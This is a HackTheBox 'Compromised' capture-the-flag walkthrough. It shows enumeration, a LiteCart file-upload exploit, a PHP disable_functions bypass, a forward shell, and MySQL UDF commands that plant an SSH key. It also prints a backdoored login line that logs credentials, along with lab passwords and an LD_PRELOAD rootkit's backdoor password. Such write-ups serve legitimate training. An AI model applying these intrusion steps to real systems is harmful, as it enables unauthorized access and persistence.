# HackTheBox - Compromised

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxT0TM0-sg2fALKV1t%2Fimage.png?alt=media\&token=c6cc45b1-31e8-4fb6-819b-dfb9c742af31)

### Nmap scan results

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxStcS8jCWWk1McpOO%2Fimage.png?alt=media\&token=a925ca57-2ffe-43c7-858e-d6f137e48940)

Adding **`compromised.htb`** to /etc/hosts file. Also starting off a **all port scan** in the background.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxTVHGcdF8P4KJQVY0%2Fimage.png?alt=media\&token=7945994d-57d6-44bd-91ac-c6c6eaccbacc)

### Using gobuster to scan for directories and files

```haskell
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://compromised.htb/ -o go-dirscan.out -x php,html,tx
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxUaaawglLSTr8Kd4u%2Fimage.png?alt=media\&token=38aa3a8e-451e-4988-8ed9-ad634288a456)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxUCQVB7NHShAaBB28%2Fimage.png?alt=media\&token=ca6fd041-5ec4-49d6-b5ec-1ea5c10cdee6)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxUpWe06zsM1VXJZy6%2Fimage.png?alt=media\&token=a9b4231b-757b-49b9-a9b4-15d4e9099c9b)

### Using timestamps to get recently modified files

Now that we have backup files for the CMS running, we can potentially search for config files. There is this one trick that I learned from **ippsec** (Using timestamps to get the recently modified files)

```haskell
find . -printf "%T+ %p\n" -type f | sort -u
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxVjmCuekdi_kA8sAm%2Fimage.png?alt=media\&token=95b0307c-8af4-4ebf-9b2c-d1cb9f39514c)

```c
2020-09-03+17:19:16.0000000000 ./includes/library
2020-09-03+17:19:16.0000000000 ./includes/library/lib_user.inc.php
2020-09-03+17:20:34.0000000000 ./admin/login.php
2020-09-03+17:20:56.0000000000 ./admin
// These were the recently modified files
```

```c
<?php
  require_once('../includes/app_header.inc.php');

  document::$template = settings::get('store_template_admin');
  document::$layout = 'login';

  if (!empty($_GET['redirect_url'])) {
    $redirect_url = (basename(parse_url($_REQUEST['redirect_url'], PHP_URL_PATH)) != basename(__FILE__)) ? $_REQUEST['redirect_url'] : document::link(WS_DIR_ADMIN);
  } else {
    $redirect_url = document::link(WS_DIR_ADMIN);
  }

  header('X-Robots-Tag: noindex');
  document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';

  if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

  if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }

  if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';

  $page_login = new view();
  $page_login->snippets = array(
    'action' => $redirect_url,
  );
  echo $page_login->stitch('pages/login');

  require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');

?>
```

```c
if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }
```

The above code is logging the username and password for admin into **`.log2301c9430d8593ae.txt`** file. Maybe we can still access that file, let's try that.

> **User: admin   Passwd: theNextGenSt0r3!\~**

### Exploiting LiteCart (Vulnerable to Arbitrary File Upload)

**`Version Used : LiteCart 2.1.2`**

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxYLSKdewW69c8qjnt%2Fimage.png?alt=media\&token=7021ad56-e7b2-4d63-8c99-9a93f6b34d2f)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxYX7yjvNGUl9PyBpJ%2Fimage.png?alt=media\&token=48749d45-3663-47e4-9eee-5218633a1681)

Upload a php file and change the **Content-Type** to `application/xml`.&#x20;

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxYz4BkVHQrRwVAi8F%2Fimage.png?alt=media\&token=2be683f0-cc83-409c-9a29-8ec6b3cc6bec)

Now visit <http://compromised.htb/shop/vqmod/xml/demo.php> and you should get the following page.&#x20;

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxZAi9tM2HksTK-gPm%2Fimage.png?alt=media\&token=900be03a-62c5-40b2-b5be-362ffcd757ca)

### PHP disable\_functions bypass

But the only problem is that we can't run system executing commands on php. This can be because of PHP [disabled ](https://www.a2hosting.in/kb/developer-corner/php/using-php.ini-directives/php-disable_functions-directive)[functions](https://www.a2hosting.in/kb/developer-corner/php/using-php.ini-directives/php-disable_functions-directive). To check it ,we can execute **`phpinfo()`** command.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZx_WdJodzlBD59FuWn%2Fimage.png?alt=media\&token=240cd90b-565c-458a-bd63-0079f948b384)

There are two ways to get a shell on the box. The first way is to use weevely (**Weevely** is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.) and the another way is to use **`disable_functions bypass - PHP 7.0-7.4`** script.

{% embed url="<https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only>" %}

Get the exploit from [here ](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)and upload it. We can even modify the script a bit to accept a GET/POST request and execute it, rather than manually entering the values.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxcfHDZllYUX-836Ig%2Fimage.png?alt=media\&token=b8c5d13f-52b9-4621-b199-443c1b26a1f4)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxd1TzEU5FMGptzjDA%2Fimage.png?alt=media\&token=ea03b2c2-6f94-4b4f-9388-7d81523191b8)

We can't get a reverse shell because of the firewall rules. To check the **`iptables`** rules, we can browse to **`/etc/iptables`** and list for rules.

```c
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020

```

Instead we can use forward shell.

{% embed url="<https://github.com/IppSec/forward-shell>" %}

### Using forward shell to shell access

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxeVCEbjLOU45w5APu%2Fimage.png?alt=media\&token=9f8b711b-f54c-4746-88e3-480483879388)

We can even upgrade the shell (Uses **`pty`** from python) by typing upgrade command.

{% hint style="info" %}
The **pty** module defines operations for handling the pseudo-terminal concept: starting another process and being able to write to and read from its controlling terminal programmatically. ... Connect the child's controlling terminal to a pseudo-terminal. Return value is (pid, fd) .
{% endhint %}

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxepiS4tFdHtAZT4p4%2Fimage.png?alt=media\&token=a053fb17-b15d-41fc-b19d-4916f99797ff)

### Misconfiguration in MySQL

```c
// Database Configs
  define('DB_TYPE', 'mysql');                                                                                                                                                                 
  define('DB_SERVER', 'localhost');                                                                                                                                                           
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'changethis');
  define('DB_DATABASE', 'ecom');
  define('DB_TABLE_PREFIX', 'lc_');
  define('DB_CONNECTION_CHARSET', 'utf8');
  define('DB_PERSISTENT_CONNECTIONS', 'false');
```

MySQL user has given a shell, usually it is set to **`/bin/false`** but now it is set to **`/bin/bash`** which is strange. That means we can SSH into that user.

```c
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
```

Let's see if **mysql** has UDF(User-defined functions) present. We have creds to connect.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxg8Z1BrFDINaXfreB%2Fimage.png?alt=media\&token=aa23b1d2-be6c-4f5c-ae91-042f9a0492d9)

Looks like we run commands as mysql user.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxgR-eNtZbwqmc24_G%2Fimage.png?alt=media\&token=b0884caa-787c-4d92-90c6-1e73d72e4299)

One thing that we can do is create a **`.ssh`** directory and then copy the contents of our **`public key`** into it. This is how we can get shell as mysql using SSH Protocol.

```c
// Create a pair of SSH Keys
ssh-keygen -f mysql
```

```c
select exec_cmd('mkdir .ssh');
select exec_cmd('echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkB5LPkMjts3c9RE8ea1ftX+xMCA2ppgNYP5B1mxkW/3vR185WS+KamWjrTZ3NImNkWuC2MEn1og6aIUZ4R0jPvccHeX0urY2wH4AFnjKL6Hu03hra2HWt3ca2SgiKgKHjZUWWlVeow5tTlWSDgJQ12faugpn6sWfPYmPMX/iVIiCBRbURVRDQP+7c/MUCqEmtITwH8atCFNyjLHM7B9d210SJb+1eP++ZDydFFpd1bMhe79ABwHY5YC1Lm3h0cZTYjGicbwVp0RLIUIrtyz0Y8u/I+2nZyINLYEYeIUDavLBK/B/BrX8NgsQoH/n9cEboBKN+MSsaWYx3exIXB8chUZkoPQ4xff3qfiGYsO5xO2GnBscmkicGWTNOXKpGj9iYZTX654XtUBRBJwcJFuxg46i+9SNlkxj/xHLYeIHfBNPe+DyRgg2k/E4bTnzbC8La1Sa3CJpMUqzPWRwrhBeLrp2ThowNOuDYokjYBpeAu6tA2XyDPGfCZkhvntncV5U= root@LAPTOP-UFMALO92" > .ssh/authorized_keys');
select exec_cmd('chmod 600 .ssh/authorized_keys');
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxh_7N12rv00g6GU18%2Fimage.png?alt=media\&token=bb4a98b2-df4c-492c-b073-5f69f4fb5e56)

### Analyzing the strace-log.dat (Keylogger)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxkSQhBjxJtNm-cZ5F%2Fimage.png?alt=media\&token=c5122d33-cbd2-4118-a8a4-4a6559501831)

This strace-dat.log file is logging all the keys, if you will observe it properly you can see a pattern. See the screenshot below.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxkX1hZmCC7RV3wrSV%2Fimage.png?alt=media\&token=9a9d7f16-ab58-4165-8126-a1759765c903)

```c
mysql -u root --password 3*NLJE32I$Fe
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxl0BACsCYnvzdb1NP%2Fimage.png?alt=media\&token=c84605a8-e14e-4a88-8eb4-9bbaebfa48ba)

Also the password for sysadmin : **`3*NLJE32I$Fe`**

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxlJGWOLS9abQd6nDp%2Fimage.png?alt=media\&token=5bfcae58-3649-4c61-ba24-4827198bd833)

### Exploiting LD\_PRELOAD Rootkit (libdate.so)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxnbvPV_Z-auoyvwDF%2Fimage.png?alt=media\&token=9d973720-9675-4194-9618-c21a59a2af97)

We can analyze the libdate.so file in ghidra. Get that file using scp.

```c
scp sysadmin@10.10.10.207:/lib/x86_64-linux-gnu/libdate.so .
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxoJZAZvsQs_tlpxSH%2Fimage.png?alt=media\&token=d1a280b8-effb-4f46-a94d-60743fb11553)

So after reading the **`local_x`** variables, if it's equal then it will run **`/bin/sh`** command. Let's decode that variable values using [Cyberchef](https://gchq.github.io/CyberChef/).

Decoded Value : **`2wkeOU4sjv84ok/`**

So upon execution of SUID Binary (binary should accept input from the user), if we enter the value that we just decoded, we will get a root shell. Let's try that on **`su (substitute user)`**&#x62;inary.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxp4xYbVcYGZiOT_xq%2Fimage.png?alt=media\&token=ed5a26f8-78ca-49aa-b04c-fbbfc3719352)